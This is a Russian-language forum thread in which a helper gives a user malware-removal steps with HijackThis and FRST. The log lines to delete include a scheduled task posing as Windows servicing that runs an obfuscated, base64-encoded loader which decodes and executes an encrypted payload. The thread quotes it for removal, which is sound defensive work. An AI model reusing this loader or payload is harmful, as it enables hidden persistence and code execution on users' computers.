Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) sergey24091977, спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Отчёт о работе прикрепите.
Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:
Код:
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Default_Page_URL] = http://gpoisk.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = podsolnushki.com
R3 - HKCU\..\URLSearchHooks: (no name) - {8dec4b69-27c4-405d-a37d-8d45c83f66ab} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00avast: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: AVGPCTuneUp_Task_BkGndMaintenance - C:\Program Files\AVG\AVG PC TuneUp\tuscanx.exe $(Arg0) (file missing)
O22 - Task: TuneUpUtilities_Task_BkGndMaintenance2013 - C:\Program Files\AVG\AVG PC TuneUp\OneClick.exe $(Arg0) (file missing)
O22 - Task: \Microsoft\Windows\Servicing\Servicing - C:\Program Files\Windows NT\Accessories\task.exe -c "$ddd = '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';iex('$'+'d=''Wm5WdVkzUnBiMjRnWkdWaktGdGllWFJsVzExZEpHTmlMQ0JiYzNSeWFXNW5YU1J3WVhOektYc2tjR0lnUFNCYlUzbHpkR1Z0TGxSbGVIUXVSVzVqYjJScGJtZGRPanBWVkVZNExrZGxkRUo1ZEdWektDUndZWE56S1Rza2N5QTlJQ1J3WWxzd1hUc2thajB3TzJadmNpZ2thU0E5SURBN0lDUnBJQzFzZENBa1kySXVRMjkxYm5RN0lDUnBLeXNwZTJsbUtDUnFJQzFuWlNBa2NHSXVRMjkxYm5RcGV5UnFQVEI5SUNSeklEMGdLREl6SUMxaVlXNWtJQ1J6SUMxaWIzSWdNVFV5S1NBdFluaHZjaUFrY3pza1kySmJKR2xkSUQwZ0pHTmlXeVJwWFNBdFluaHZjaUFrY0dKYkpHcGRJQzFpZUc5eUlDUnpPeVJxS3l0OWNtVjBkWEp1SUNSallqdDlKRzlpYWlBOUlHZDNiV2tnZDJsdU16SmZaR2x6YTJSeWFYWmxJSHdnZDJobGNtVWdleVJmTGtSbGRtbGpaVWxFSUMxbGNTQW5YRnd1WEZCSVdWTkpRMEZNUkZKSlZrVXdKMzBnZkNCelpXeGxZM1FnVFc5a1pXd3NJRk5sY21saGJHNTFiV0psY2pza1pDQTlJR1JsWXlBb1cxTjVjM1JsYlM1RGIyNTJaWEowWFRvNlJuSnZiVUpoYzJVMk5GTjBjbWx1Wnlna1pHUmtLU2tnS0NSdlltb3VUVzlrWld3Z0t5QW5JQ2NnS3lBa2IySnFMbE5sY21saGJHNTFiV0psY2lrN2FXVjRJQ2hwWlhnb0oxdFRlWE4wWlcwdVZHVjRkQzVGYm1OdlpHbHVaMTA2T2xWVVJqZ3VSMlYwSnlzblUzUnlhVzVuS0NSa0tTY3BLUT09'';for($z=2;$z--;){$'+'d=[Syst'+'em.Te'+'xt.Enco'+'ding]::U'+'TF'+4*2+'.Get'+'Str'+'ing([Sys'+'tem.Conv'+'ert]::From'+'Base6'+'4String($d))}$'+'d|i'+'ex;')" (Microsoft)
O22 - Task: \Microsoft\Windows\SideShow\GadgetManager - {FF87090D-4A9A-4f47-879B-29A80C355D61},$(Arg0) - (no file)
O22 - Task: {FA3657B6-F681-4684-9C64-5FED3FA9E4A1} - C:\Dizzy-Games\Mystery of the Ancients 4. Deadly Cold CE (RUS)\MysteryOfTheAncients_DeadlyColdCE.exe (file missing)
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).